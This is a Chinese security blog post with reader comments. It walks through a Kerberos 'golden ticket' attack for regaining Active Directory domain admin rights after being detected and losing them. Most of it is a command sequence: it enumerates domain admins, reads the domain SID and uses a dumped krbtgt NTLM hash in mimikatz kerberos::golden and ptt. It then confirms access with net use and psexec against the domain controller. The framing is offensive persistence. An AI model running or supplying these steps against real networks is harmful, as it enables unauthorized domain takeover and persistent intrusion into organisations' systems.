域渗透的金之钥匙

mickey 2015-10-13 11:33:00

0x00 废话连篇


最近几年很少搞内网渗透了,这几年发展的快啊,看了A牛翻译的<<Fireeye Mandiant 2014 安全报告 Part1>>,发现趋势都是powershell脚本化了。想当年遇到的域控都是windows 2003的,找朋友要些vbscript脚本自动化,然后那啥那啥的。现在搞域除了前段时间出的MS14068,还有龙哥翻译的(http://drops.wooyun.org/papers/576),不知道还有什么新方法,心中还有激情,如果想交流的朋友,可以加我聊聊。

0x01 金之钥匙


我原来发过一个微薄说

这就是我说的金之钥匙,利用这个的条件是你在原来搞定域控的时候,已经导出过域用户的HASH,尤其是krbtgt 这个用户的。但是在你在内网干其他事情的时候,活儿不细,被人家发现了,你拥有的域管理员权限掉了,你现在还有一个普通的域用户权限,管理员做加固的时候又忘记修改krbtgt密码了(很常见),我们还是能重新回来,步骤如下:

要重新拿回域管理员权限,首先要先知道域内的管理员有谁

C:\Users\hydra>net group "domain admins" /domain

我这里的实验环境,通过截图可以看到域管理员是administrator

我还要知道域SID是啥

C:\Users\hydra>whoami /user

我的域SID是S-1-5-21-3883552807-251258116-2724407435

还有最重要的krbtgt用户的ntlm哈希,我原来导出的是

krbtgt(current-disabled):502:aad3b435b51404eeaad3b435b51404ee:6a8e501fabcf264c70 ef3316c6aab7dc:::

然后该用神器mimikatz出场了,依次执行

mimikatz # kerberos::purge
mimikatz # kerberos::golden /admin:Administrator /domain:pentstlab.com /sid:S-1-5-21-3883552807-251258116-2724407435 /krbtgt:6a8e501fabcf264c70ef3316c6aab7dc /ticket:Administrator.kiribi
mimikatz # kerberos::ptt Administrator.kiribi
mimikatz # kerberos::tgt

到现在,我们又重新拥有域管理员权限了,可以验证下

E:\>net use \\WIN-0DKN2AS0T2G\c$
E:\>psexec.exe \\WIN-0DKN2AS0T2G cmd

0x02 后话闲扯


呃,感觉这个方法比http://drops.wooyun.org/tips/9297这个方便些,文章写了好久了,一直凑不出更多的字数,就没发。。嗯。。。懒了。。

评论

珈蓝夜宇 2015-10-13 11:36:57

我的第一眼"
我原来发过一个微薄说
"
微薄说

小菜鸟 2015-10-13 11:41:55

大神啊,我菜鸟不知道mimikatz具体维持域控制权命令,找了俩三天具体用法。你就在今天发出来了,哈哈!!

猪猪侠 2015-10-13 14:48:45

今年blackhat 上,微软ATA那个哥哥关于域渗透的议题讲得很深

T

test 2015-10-13 15:44:01

一直没有出现Lifetime是什么原因

T

test 2015-10-13 15:44:24

@test golden里面

小菜鸟 2015-10-13 16:18:03

完全按照楼主说的,行不通啊。。。。。。。。

路人甲 2015-10-13 16:40:55

来溜达看看....咳...看不懂

mickey 2015-10-13 18:07:03

@Her0in
.....
我哪儿表现出是我发现的了...-_-!!!
叫金之钥匙是因为当时看到有老外说了还有另一个方法搞域管权限的方法,想的叫银之钥,不过实践后,不太通用,当时懒,就没写完。"golden ticket(s)"叫黄金票据,确实比较好,多谢指点。

V

Vigoss_Z 2015-10-13 19:51:19

我是你的脑残粉。

M

Mr.x 2015-10-14 09:23:23

@Her0in 使用 golden ticket 连接域控 你也相当于给其他攻击者留下了后门,能否给科普科普下?

_

_Evil 2015-10-14 10:09:10

drops 三好学生说了mimi各种用法姿势比较全

I

if、so 2015-10-14 20:45:41

其实现实中,不是如何拿到权限,而是如何生存

H

Her0in 2015-10-15 20:58:18

@Mr.x PM!:)

1

123 2015-10-16 10:23:57

@Her0in 猫又叫咪咪,我就叫这个金钥匙,叫了好几年了

小菜鸟 2015-10-16 14:51:35

楼主有联系方式吗,我想详细请教您用法,我虚拟机私搭的环境用楼主方法行不通啊,命令行试了很多遍是没有错的!!!!!求楼主不吝赐教啊!!!!

雪碧0xroot 2015-10-16 21:52:44

来看Mickey牛秒域控了

存在敏感词 2015-10-19 10:44:57

我是看着mickey的文章长大的

路人甲 2015-10-27 20:27:53

@Her0in 装什么逼了?这个有标准翻译么? 翻译成金票你能咋的?本身意思就差不多。比如Mandiant 翻译成曼迪安特和曼迪亚特错了么?

mickey

此号多人用,发表任何信息不代表本人观点

twitter weibo github wechat

随机分类

IoT安全 文章:29 篇
CTF 文章:62 篇
数据安全 文章:29 篇
企业安全 文章:40 篇
Java安全 文章:34 篇

扫码关注公众号

WeChat Offical Account QRCode

最新评论

Article_kelp

因为这里的静态目录访功能应该理解为绑定在static路径下的内置路由,你需要用s

N

Nas

师傅您好!_static_url_path那 flag在当前目录下 通过原型链污

Z

zhangy

你好,为什么我也是用windows2016和win10,但是流量是smb3,加密

K

k0uaz

foniw师傅提到的setfge当在类的字段名成是age时不会自动调用。因为获取

Yukong

🐮皮

目录